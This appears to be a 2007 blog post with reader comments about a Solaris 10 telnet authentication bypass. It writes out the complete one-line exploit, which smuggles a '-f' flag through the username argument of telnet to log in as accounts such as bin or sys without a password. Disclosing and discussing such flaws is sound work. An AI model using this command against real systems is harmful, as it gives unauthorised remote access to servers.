How long does it take to remotely hack fully patched Solaris 10 installation with telnet enabled? As long as it takes to type this simple standard system command:
telnet -l"-fusername" host i.e. telnet -l"-fbin" solaris10-server or telnet -l"-fsys" 127.0.0.1 Yeh, it's that simple. Here's a screenshot:
Information about this 0-day vulnerability appeared on a security news list today and spread like wildfire.
Certainly, most organisations which take security seriously will use SSH and disable telnet. However, considering that this vulnerability affects a default system installation, it is likely that companies using Solaris 10 and not implementing strong security configuration, will be seriously affected.
That's truly a return of the "good" old days for hackers, when hacking into any server was a trivial task that required only a simple command. To see this type of vulnerability these days is extremely unusual and pretty much shocking for IT security community. Most of all, it is a terrible embarrassment for Sun Microsystems.
3 comments:
Hi Marek,
You may aware that this vulnerability doesn't affect Solaris 2.6 - 9.0 as discussed in vulnerability mailing list (http://whitestar.linuxbox.org/pipermail/exploits/2007-February/000104.html).
Sure, that's why I wrote "Solaris 10, 11" in the post title :-)
LOL :) Yeah ... I have a Solaris Box at Home and had Telnet enabled. Luckly it is still the old Solaris 9.0 :)
Post a Comment